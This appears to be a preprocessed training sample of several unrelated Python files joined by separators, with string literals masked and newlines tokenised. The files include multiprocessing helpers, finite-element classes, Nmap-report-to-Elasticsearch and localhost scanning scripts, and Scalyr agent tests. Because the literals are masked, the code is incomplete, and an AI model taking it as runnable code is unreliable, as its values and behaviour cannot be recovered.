_wrapper_with_sockets , args = args , kwargs = kwargs ) <EOL> p . start ( ) <EOL> cb = Callback ( ) <EOL> get_chan_service = partial ( get_conn , cb ) <EOL> service = Service ( get_chan_service , port , bindaddr = "<STR_LIT:127.0.0.1>" , backlog = <NUM_LIT:1> ) <EOL> service . _add ( ) <EOL> conn = yield cb <EOL> yield service . stop ( ) <EOL> chan = SocketChannel ( conn ) <EOL> main_chan , log_chan = make_subchannels ( chan , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> launch ( log_receive , log_chan ) <EOL> yield Return ( p , main_chan ) <EOL> class PipeHandler ( logging . Handler ) : <EOL> def __init__ ( self , pipe ) : <EOL> logging . Handler . __init__ ( self ) <EOL> self . pipe = pipe <EOL> def setFormatter ( self , formatter ) : <EOL> self . 
formatter = formatter <EOL> def send ( self , record ) : <EOL> if record . args and isinstance ( record . args , tuple ) : <EOL> args = record . args <EOL> new_args = [ ] <EOL> for arg in args : <EOL> if isinstance ( arg , str ) : <EOL> new_args . append ( arg . decode ( '<STR_LIT:utf-8>' , '<STR_LIT:replace>' ) ) <EOL> else : <EOL> new_args . append ( arg ) <EOL> record . args = tuple ( new_args ) <EOL> self . pipe . send ( self . formatter . format ( record ) ) <EOL> def emit ( self , record ) : <EOL> try : <EOL> self . send ( record ) <EOL> except ( KeyboardInterrupt , SystemExit ) : <EOL> raise <EOL> except : <EOL> self . handleError ( record ) <EOL> def close ( self ) : <EOL> logging . Handler . close ( self ) <EOL> def _wrapper_with_pipes ( target , log_pipe , pipe , * args , ** kwargs ) : <EOL> formatter = logging . Formatter ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> pipehandler = PipeHandler ( log_pipe ) <EOL> pipehandler . setFormatter ( formatter ) <EOL> target ( pipe , * args , ** kwargs ) <EOL> def launch_proc_with_pipes ( target , * args , ** kwargs ) : <EOL> log_child , log_parent = Pipe ( ) <EOL> child , parent = Pipe ( ) <EOL> args = [ target , log_child , child ] + list ( args ) <EOL> p = Process ( target = _wrapper_with_pipes , args = args , kwargs = kwargs ) <EOL> p . start ( ) <EOL> launch ( log_receive , PipeChannel ( log_parent ) ) <EOL> return p , parent </s>
<s> from mapy . reader import user_setattr <EOL> class SPC ( object ) : <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , inputs ) : <EOL> self . card = None <EOL> self . entryclass = None <EOL> self . id = None <EOL> self . gridid = None <EOL> self . dof = None <EOL> self . displ = None <EOL> self . g2 = None <EOL> self . c2 = None <EOL> self . d2 = None <EOL> self . model = None <EOL> self . conscount = None <EOL> self = user_setattr ( self , inputs ) <EOL> if self . dof . __class__ . __name__ < > '<STR_LIT:list>' : <EOL> str_dof = self . dof <EOL> self . dof = set ( [ int ( dof ) for dof in str_dof ] ) <EOL> def add2model ( self , model ) : <EOL> self . model = model <EOL> model . conscount += <NUM_LIT:1> <EOL> self . conscount = model . conscount <EOL> model . consdict [ model . conscount ] = self <EOL> if self . g2 : <EOL> print '<STR_LIT>' % str ( self . g2 ) <EOL> def add2grid ( self , model ) : <EOL> grid = model . griddict [ int ( self . gridid ) ] <EOL> subcase = int ( self . id ) <EOL> for dof in self . dof : <EOL> grid . add_cons ( subcase , dof ) </s>
<s> from mapy . reader import user_setattr <EOL> from mapy . model . properties import Properties <EOL> class Prop2D ( Properties ) : <EOL> def __init__ ( self ) : <EOL> super ( Prop2D , self ) . __init__ ( ) <EOL> class PropShell ( Prop2D ) : <EOL> def __init__ ( self , inputs ) : <EOL> super ( PropShell , self ) . __init__ ( ) <EOL> self = user_setattr ( self , inputs ) <EOL> def build_C ( self ) : <EOL> import scipy <EOL> Emat = self . matobj . e <EOL> if self . matobj . nu : <EOL> Gmat = Emat / ( <NUM_LIT> * ( <NUM_LIT:1> + self . matobj . nu ) ) <EOL> else : <EOL> Gmat = self . matobj . g <EOL> self . matobj . nu = Emat / Gmat / <NUM_LIT> - <NUM_LIT:1> <EOL> nu = self . matobj . nu <EOL> self . C = ( Emat / ( <NUM_LIT:1> - nu ** <NUM_LIT:2> ) ) * scipy . array ( [ [ <NUM_LIT:1> , nu , <NUM_LIT:0> ] , [ nu , <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , ( <NUM_LIT:1> - nu ) / <NUM_LIT:2> ] ] ) </s>
<s> from libnmap . parser import NmapParser <EOL> from elasticsearch import Elasticsearch <EOL> from datetime import datetime <EOL> import pygeoip <EOL> def store_report ( nmap_report , database , index ) : <EOL> rval = True <EOL> for nmap_host in nmap_report . hosts : <EOL> rv = store_reportitem ( nmap_host , database , index ) <EOL> if rv is False : <EOL> print ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( nmap_host . address ) ) <EOL> rval = False <EOL> return rval <EOL> def get_os ( nmap_host ) : <EOL> rval = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> if nmap_host . is_up ( ) and nmap_host . os_fingerprinted : <EOL> cpelist = nmap_host . os . os_cpelist ( ) <EOL> if len ( cpelist ) : <EOL> mcpe = cpelist . pop ( ) <EOL> rval . update ( { '<STR_LIT>' : mcpe . get_vendor ( ) , <EOL> '<STR_LIT>' : mcpe . get_product ( ) } ) <EOL> return rval <EOL> def get_geoip_code ( address ) : <EOL> gi = pygeoip . GeoIP ( '<STR_LIT>' ) <EOL> return gi . country_code_by_addr ( address ) <EOL> def store_reportitem ( nmap_host , database , index ) : <EOL> host_keys = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:address>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:status>" ] <EOL> jhost = { } <EOL> for hkey in host_keys : <EOL> if hkey == "<STR_LIT>" or hkey == "<STR_LIT>" : <EOL> val = getattr ( nmap_host , hkey ) <EOL> jhost [ hkey ] = datetime . fromtimestamp ( int ( val ) if len ( val ) else <NUM_LIT:0> ) <EOL> else : <EOL> jhost [ hkey ] = getattr ( nmap_host , hkey ) <EOL> jhost . update ( { '<STR_LIT>' : get_geoip_code ( nmap_host . address ) } ) <EOL> jhost . update ( get_os ( nmap_host ) ) <EOL> for nmap_service in nmap_host . services : <EOL> reportitems = get_item ( nmap_service ) <EOL> for ritem in reportitems : <EOL> ritem . update ( jhost ) <EOL> database . 
index ( index = index , <EOL> doc_type = "<STR_LIT>" , <EOL> body = ritem ) <EOL> return jhost <EOL> def get_item ( nmap_service ) : <EOL> service_keys = [ "<STR_LIT:port>" , "<STR_LIT>" , "<STR_LIT:state>" ] <EOL> ritems = [ ] <EOL> jservice = { } <EOL> for skey in service_keys : <EOL> jservice [ skey ] = getattr ( nmap_service , skey ) <EOL> jservice [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> jservice [ '<STR_LIT>' ] = nmap_service . service <EOL> jservice [ '<STR_LIT>' ] = nmap_service . banner <EOL> ritems . append ( jservice ) <EOL> for nse_item in nmap_service . scripts_results : <EOL> jnse = { } <EOL> for skey in service_keys : <EOL> jnse [ skey ] = getattr ( nmap_service , skey ) <EOL> jnse [ '<STR_LIT:type>' ] = '<STR_LIT>' <EOL> jnse [ '<STR_LIT>' ] = nse_item [ '<STR_LIT:id>' ] <EOL> jnse [ '<STR_LIT>' ] = nse_item [ '<STR_LIT>' ] <EOL> ritems . append ( jnse ) <EOL> return ritems <EOL> xmlscans = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for xmlscan in xmlscans : <EOL> nmap_report = NmapParser . parse_fromfile ( xmlscan ) <EOL> if nmap_report : <EOL> rep_date = datetime . fromtimestamp ( int ( nmap_report . started ) ) <EOL> index = "<STR_LIT>" . format ( rep_date . strftime ( '<STR_LIT>' ) ) <EOL> db = Elasticsearch ( ) <EOL> j = store_report ( nmap_report , db , index ) </s>
<s> from libnmap . process import NmapProcess <EOL> from time import sleep <EOL> def make_nmproc_obj ( targets , options ) : <EOL> return NmapProcess ( targets = targets , options = options ) <EOL> def start_all_bg ( nmprocs ) : <EOL> for nmp in nmprocs : nmp . run_background ( ) <EOL> def any_running ( nmprocs ) : <EOL> return any ( [ nmp . is_running ( ) for nmp in nmprocs ] ) <EOL> def summarize ( nmprocs ) : <EOL> for nmp in nmprocs : <EOL> print ( "<STR_LIT>" . format ( nmp . rc , nmp . summary , len ( nmp . stdout ) ) ) <EOL> nm_targets = [ ] <EOL> for h in range ( <NUM_LIT:10> ) : <EOL> nm_targets . append ( "<STR_LIT:localhost>" ) <EOL> nm_opts = "<STR_LIT>" <EOL> nm_procs = [ make_nmproc_obj ( t , nm_opts ) for t in nm_targets ] <EOL> start_all_bg ( nm_procs ) <EOL> while any_running ( nm_procs ) : <EOL> print ( "<STR_LIT>" ) <EOL> sleep ( <NUM_LIT:2> ) <EOL> summarize ( nm_procs ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import random <EOL> NOUNS = ( <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , 
"<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT:Name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" <EOL> ) <EOL> ADJECTIVES = ( <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , 
"<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , 
"<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> ) <EOL> class Title ( object ) : <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def make_title ( self ) : <EOL> adj = random . choice ( ADJECTIVES ) <EOL> noun = random . choice ( NOUNS ) <EOL> noun2 = random . choice ( NOUNS ) <EOL> return random . choice ( [ <EOL> lambda : "<STR_LIT>" % ( adj , noun ) , <EOL> lambda : "<STR_LIT>" % ( adj , noun ) , <EOL> lambda : "<STR_LIT>" % ( noun , noun2 ) , <EOL> lambda : "<STR_LIT>" % ( noun , noun2 ) , <EOL> lambda : "<STR_LIT>" % ( noun , noun2 ) , <EOL> lambda : "<STR_LIT>" % ( noun , noun2 ) <EOL> ] ) ( ) <EOL> def next ( self ) : <EOL> return self . make_title ( ) </s>
<s> commands = { } <EOL> def register ( name , function ) : <EOL> "<STR_LIT>" <EOL> if name in commands : <EOL> print ( "<STR_LIT>" % name ) <EOL> commands [ name ] = function <EOL> def command ( function ) : <EOL> "<STR_LIT>" <EOL> def canonical ( name ) : <EOL> return name . strip ( "<STR_LIT:_>" ) . replace ( "<STR_LIT:_>" , "<STR_LIT:->" ) <EOL> name = canonical ( function . __name__ ) <EOL> register ( name , function ) <EOL> return function <EOL> def named ( * names ) : <EOL> "<STR_LIT>" <EOL> def decorate ( function ) : <EOL> for name in names : <EOL> register ( name , function ) <EOL> return function <EOL> return decorate <EOL> events = { "<STR_LIT>" : { } , "<STR_LIT>" : { } , "<STR_LIT>" : { } } <EOL> def event ( name , concurrent = False ) : <EOL> "<STR_LIT>" <EOL> def decorate ( function ) : <EOL> function . concurrent = concurrent <EOL> events [ "<STR_LIT>" ] . setdefault ( name , [ ] ) <EOL> events [ "<STR_LIT>" ] [ name ] . append ( function ) <EOL> return function <EOL> return decorate <EOL> startups = [ ] <EOL> def startup ( function ) : <EOL> "<STR_LIT>" <EOL> startups . append ( function ) <EOL> return function <EOL> builders = [ ] <EOL> def builder ( function ) : <EOL> "<STR_LIT>" <EOL> builders . append ( function ) <EOL> return function <EOL> def clear ( ) : <EOL> "<STR_LIT>" <EOL> commands . clear ( ) <EOL> events [ "<STR_LIT>" ] . clear ( ) <EOL> events [ "<STR_LIT>" ] . clear ( ) <EOL> events [ "<STR_LIT>" ] . clear ( ) <EOL> del startups [ : ] <EOL> del builders [ : ] </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from scalyr_agent . scalyr_monitor import ScalyrMonitor <EOL> from scalyr_agent . scalyr_monitor import BadMonitorConfiguration <EOL> from scalyr_agent . scalyr_monitor import MonitorConfig <EOL> from scalyr_agent . scalyr_monitor import UnsupportedSystem <EOL> from scalyr_agent . scalyr_monitor import define_metric <EOL> from scalyr_agent . scalyr_monitor import define_config_option <EOL> from scalyr_agent . scalyr_monitor import define_log_field <EOL> from scalyr_agent . util import StoppableThread <EOL> from scalyr_agent . util import RunState <EOL> from scalyr_agent . scalyr_logging import getLogger <EOL> from scalyr_agent . scalyr_logging import AgentLogger <EOL> from scalyr_agent . scalyr_logging import DEBUG_LEVEL_0 , DEBUG_LEVEL_1 , DEBUG_LEVEL_2 <EOL> from scalyr_agent . scalyr_logging import DEBUG_LEVEL_3 , DEBUG_LEVEL_4 , DEBUG_LEVEL_5 <EOL> from scalyr_agent . scalyr_logging import AutoFlushingRotatingFileHandler <EOL> import json_lib <EOL> import monitor_utils <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> __author__ = '<STR_LIT>' <EOL> class JsonConversionException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message ) : <EOL> Exception . __init__ ( self , message ) <EOL> class JsonMissingFieldException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message ) : <EOL> Exception . __init__ ( self , message ) <EOL> class JsonParseException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message , position , line_number ) : <EOL> self . position = position <EOL> self . line_number = line_number <EOL> self . raw_message = message <EOL> position_message = "<STR_LIT>" % ( line_number , <EOL> position ) <EOL> Exception . __init__ ( self , message + position_message ) </s>
<s> __author__ = '<STR_LIT>' <EOL> import cStringIO <EOL> from scalyr_agent . agent_status import OverallStats , AgentStatus , ConfigStatus , LogProcessorStatus , MonitorStatus <EOL> from scalyr_agent . agent_status import CopyingManagerStatus , MonitorManagerStatus , LogMatcherStatus , report_status <EOL> from scalyr_agent . test_base import ScalyrTestCase <EOL> class TestOverallStats ( ScalyrTestCase ) : <EOL> def test_read_file_as_json ( self ) : <EOL> a = OverallStats ( ) <EOL> b = OverallStats ( ) <EOL> a . total_bytes_copied = <NUM_LIT:1> <EOL> a . total_bytes_skipped = <NUM_LIT:2> <EOL> a . total_bytes_subsampled = <NUM_LIT:3> <EOL> a . total_bytes_failed = <NUM_LIT:4> <EOL> a . total_redactions = <NUM_LIT:5> <EOL> a . total_copy_requests_errors = <NUM_LIT:6> <EOL> a . total_monitor_reported_lines = <NUM_LIT:7> <EOL> a . total_monitor_errors = <NUM_LIT:8> <EOL> a . total_requests_sent = <NUM_LIT:1> <EOL> a . total_requests_failed = <NUM_LIT:2> <EOL> a . total_request_bytes_sent = <NUM_LIT:3> <EOL> a . total_response_bytes_received = <NUM_LIT:4> <EOL> a . total_request_latency_secs = <NUM_LIT:5> <EOL> a . total_connections_created = <NUM_LIT:6> <EOL> b . total_bytes_copied = <NUM_LIT:9> <EOL> b . total_bytes_skipped = <NUM_LIT:10> <EOL> b . total_bytes_subsampled = <NUM_LIT:11> <EOL> b . total_bytes_failed = <NUM_LIT:12> <EOL> b . total_redactions = <NUM_LIT> <EOL> b . total_copy_requests_errors = <NUM_LIT> <EOL> b . total_monitor_reported_lines = <NUM_LIT:15> <EOL> b . total_monitor_errors = <NUM_LIT:16> <EOL> b . total_requests_sent = <NUM_LIT:7> <EOL> b . total_requests_failed = <NUM_LIT:8> <EOL> b . total_request_bytes_sent = <NUM_LIT:9> <EOL> b . total_response_bytes_received = <NUM_LIT:10> <EOL> b . total_request_latency_secs = <NUM_LIT:11> <EOL> b . total_connections_created = <NUM_LIT:12> <EOL> c = a + b <EOL> self . assertEquals ( c . total_bytes_copied , <NUM_LIT:10> ) <EOL> self . assertEquals ( c . total_bytes_skipped , <NUM_LIT:12> ) <EOL> self . 
assertEquals ( c . total_bytes_subsampled , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_bytes_failed , <NUM_LIT:16> ) <EOL> self . assertEquals ( c . total_redactions , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_copy_requests_errors , <NUM_LIT:20> ) <EOL> self . assertEquals ( c . total_monitor_reported_lines , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_monitor_errors , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_requests_sent , <NUM_LIT:8> ) <EOL> self . assertEquals ( c . total_requests_failed , <NUM_LIT:10> ) <EOL> self . assertEquals ( c . total_request_bytes_sent , <NUM_LIT:12> ) <EOL> self . assertEquals ( c . total_response_bytes_received , <NUM_LIT> ) <EOL> self . assertEquals ( c . total_request_latency_secs , <NUM_LIT:16> ) <EOL> self . assertEquals ( c . total_connections_created , <NUM_LIT> ) <EOL> class TestReportStatus ( ScalyrTestCase ) : <EOL> def setUp ( self ) : <EOL> self . time = <NUM_LIT> <EOL> self . status = AgentStatus ( ) <EOL> self . status . launch_time = self . time - <NUM_LIT> <EOL> self . status . log_path = '<STR_LIT>' <EOL> self . status . scalyr_server = '<STR_LIT>' <EOL> self . status . server_host = '<STR_LIT>' <EOL> self . status . user = '<STR_LIT:root>' <EOL> self . status . version = '<STR_LIT>' <EOL> config_status = ConfigStatus ( ) <EOL> self . status . config_status = config_status <EOL> config_status . last_read_time = self . time - <NUM_LIT> <EOL> config_status . last_check_time = self . time <EOL> config_status . last_good_read = self . time - <NUM_LIT> <EOL> config_status . path = '<STR_LIT>' <EOL> config_status . status = '<STR_LIT>' <EOL> config_status . additional_paths = [ '<STR_LIT>' ] <EOL> copying_status = CopyingManagerStatus ( ) <EOL> self . status . copying_manager_status = copying_status <EOL> copying_status . last_attempt_size = <NUM_LIT> <EOL> copying_status . last_attempt_time = self . time - <NUM_LIT> <EOL> copying_status . 
last_response_status = '<STR_LIT:success>' <EOL> copying_status . total_errors = <NUM_LIT:0> <EOL> copying_status . total_bytes_uploaded = <NUM_LIT> <EOL> copying_status . last_success_time = self . time - <NUM_LIT> <EOL> log_matcher = LogMatcherStatus ( ) <EOL> copying_status . log_matchers . append ( log_matcher ) <EOL> log_matcher . is_glob = False <EOL> log_matcher . last_check_time = self . time - <NUM_LIT:10> <EOL> log_matcher . log_path = '<STR_LIT>' <EOL> log_matcher = LogMatcherStatus ( ) <EOL> copying_status . log_matchers . append ( log_matcher ) <EOL> log_matcher . is_glob = False <EOL> log_matcher . last_check_time = self . time - <NUM_LIT:10> <EOL> log_matcher . log_path = '<STR_LIT>' <EOL> process_status = LogProcessorStatus ( ) <EOL> log_matcher . log_processors_status . append ( process_status ) <EOL> process_status . log_path = '<STR_LIT>' <EOL> process_status . last_scan_time = self . time - <NUM_LIT> <EOL> process_status . total_bytes_copied = <NUM_LIT> <EOL> process_status . total_bytes_pending = <NUM_LIT> <EOL> process_status . total_bytes_skipped = <NUM_LIT:12> <EOL> process_status . total_bytes_failed = <NUM_LIT> <EOL> process_status . total_bytes_dropped_by_sampling = <NUM_LIT:0> <EOL> process_status . total_lines_copied = <NUM_LIT> <EOL> process_status . total_lines_dropped_by_sampling = <NUM_LIT:0> <EOL> process_status . total_redactions = <NUM_LIT:0> <EOL> log_matcher = LogMatcherStatus ( ) <EOL> copying_status . log_matchers . append ( log_matcher ) <EOL> log_matcher . is_glob = True <EOL> log_matcher . last_check_time = self . time - <NUM_LIT:10> <EOL> log_matcher . log_path = '<STR_LIT>' <EOL> process_status = LogProcessorStatus ( ) <EOL> log_matcher . log_processors_status . append ( process_status ) <EOL> process_status . log_path = '<STR_LIT>' <EOL> process_status . last_scan_time = self . time - <NUM_LIT> <EOL> process_status . total_bytes_copied = <NUM_LIT> <EOL> process_status . 
